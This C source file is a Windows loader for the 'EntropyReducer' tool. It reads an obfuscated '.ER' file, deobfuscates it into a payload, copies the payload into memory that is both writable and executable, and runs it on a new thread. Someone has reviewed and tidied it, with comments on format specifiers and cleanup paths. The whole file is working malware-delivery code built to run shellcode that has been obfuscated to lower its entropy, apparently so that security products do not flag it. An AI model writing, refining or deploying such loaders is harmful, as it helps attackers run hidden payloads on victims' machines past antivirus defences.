/*
program that will read a .ER file (generated by 'EntropyReducer.exe') and run it
*/
#include <Windows.h>
#include <stdio.h>
#include "EntropyReducer.h"
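/*
 * Print a failure line for the named Win32 API together with the calling
 * thread's last-error code, then return FALSE so a caller can write
 * `return ReportError("...")`.
 *
 * ApiName: name of the API that failed; printed verbatim inside quotes.
 * Returns FALSE in every case.
 */
BOOL ReportError(const char* ApiName) {
	// Capture the error code before calling printf, which may itself change it.
	DWORD dwError = GetLastError();
	// GetLastError() yields a DWORD (unsigned long); the old "%d" was a format
	// mismatch, which is undefined behaviour.
	printf("[!] \"%s\" [ FAILED ] \t%lu \n", ApiName, dwError);
	return FALSE;
}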
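/*
 * Entry point.
 *
 * Reads the whole '.ER' file named by argv[1] into a process-heap buffer,
 * passes it to Deobfuscate() (declared in EntropyReducer.h), copies the result
 * into a freshly allocated executable region, runs it on a new thread and
 * waits for that thread to finish.
 *
 * Returns 0 on success and -1 on any failure. The original returned
 * `ReportError(...)`, i.e. FALSE == 0, from most error paths, so a failed run
 * exited with a "success" status; every failure now exits with -1. The file
 * handle, heap buffer and thread handle this function owns are released on
 * every path via the single cleanup label.
 */
int main(int argc, char* argv[]) {
	int rc = -1;
	HANDLE hFile = INVALID_HANDLE_VALUE;
	HANDLE hThread = NULL;
	DWORD dwFileSize = 0;              // was "= NULL": a pointer constant used as an integer
	DWORD dwNumberOfBytesRead = 0;
	PBYTE pBuffer = NULL;
	SIZE_T DeobfuscatedPayloadSize = 0;
	PBYTE DeobfuscatedPayloadBuffer = NULL;
	PVOID pExecAddress = NULL;

	if (argc < 2) {
		printf("[!] Please Specify Input '.ER' File To Run ... \n");
		return -1;
	}
	printf("[i] BUFF_SIZE : [ 0x%0.4X ] - NULL_BYTES : [ 0x%0.4X ]\n", BUFF_SIZE, NULL_BYTES);

	hFile = CreateFileA((LPCSTR)argv[1], GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
	if (hFile == INVALID_HANDLE_VALUE) {
		ReportError("CreateFileA");
		goto cleanup;
	}

	// GetFileSize() with a NULL high part only reports the low 32 bits, as before.
	dwFileSize = GetFileSize(hFile, NULL);
	if (dwFileSize == INVALID_FILE_SIZE) {
		ReportError("GetFileSize");
		goto cleanup;
	}
	// An empty file cannot carry a payload; reject it instead of handing a
	// zero-length buffer to Deobfuscate().
	if (dwFileSize == 0) {
		printf("[!] Input File Is Empty \n");
		goto cleanup;
	}

	pBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwFileSize);
	if (!pBuffer) {
		ReportError("HeapAlloc");
		goto cleanup;
	}

	// A short read is treated as a failure: the whole file must be in memory.
	if (!ReadFile(hFile, pBuffer, dwFileSize, &dwNumberOfBytesRead, NULL) || dwNumberOfBytesRead != dwFileSize) {
		// DWORD is unsigned long, so "%lu" rather than the original "%ld".
		printf("[i] Read %lu from %lu Bytes \n", dwNumberOfBytesRead, dwFileSize);
		ReportError("ReadFile");
		goto cleanup;
	}
	CloseHandle(hFile);
	hFile = INVALID_HANDLE_VALUE;   // prevents a second CloseHandle in cleanup

	//-------------------------------------------------------------------------------------------------------------
	printf("[i] Deobfuscating \"%s\" ... ", argv[1]);
	if (!Deobfuscate(pBuffer, dwFileSize, &DeobfuscatedPayloadBuffer, &DeobfuscatedPayloadSize)) {
		goto cleanup;
	}
	printf("[+] DONE \n");
	// SIZE_T is printed with "%zu"; the pointer is cast to void* to match "%p".
	printf("\t>>> Deobfuscated Payload Size : %zu \n\t>>> Deobfuscated Payload Located At : 0x%p \n",
	       DeobfuscatedPayloadSize, (void*)DeobfuscatedPayloadBuffer);
	// NOTE(review): who owns DeobfuscatedPayloadBuffer is decided inside
	// Deobfuscate() (EntropyReducer.h, not visible here), so it is deliberately
	// not freed by this function — confirm against that implementation.
	//-------------------------------------------------------------------------------------------------------------

	printf("[$] Press <Enter> To Run ... ");
	getchar();

	// Same protection as the original: one region that is both writable and executable.
	pExecAddress = VirtualAlloc(NULL, DeobfuscatedPayloadSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!pExecAddress) {
		ReportError("VirtualAlloc");
		goto cleanup;
	}
	memcpy(pExecAddress, DeobfuscatedPayloadBuffer, DeobfuscatedPayloadSize);

	printf("[i] Running Payload Thread ... ");
	// Stack size and creation flags are integers, so 0 rather than NULL.
	hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)pExecAddress, (PVOID)"pew pew", 0, NULL);
	if (!hThread) {
		ReportError("CreateThread");
		goto cleanup;
	}
	if (WaitForSingleObject(hThread, INFINITE) == WAIT_FAILED) {
		ReportError("WaitForSingleObject");
		goto cleanup;
	}
	// The thread has finished, so the executable region can be released.
	VirtualFree(pExecAddress, 0, MEM_RELEASE);
	pExecAddress = NULL;
	printf("[+] DONE \n");
	rc = 0;

cleanup:
	if (hThread) {
		CloseHandle(hThread);
	}
	if (pBuffer) {
		HeapFree(GetProcessHeap(), 0, pBuffer);
	}
	if (hFile != INVALID_HANDLE_VALUE) {
		CloseHandle(hFile);
	}
	return rc;
}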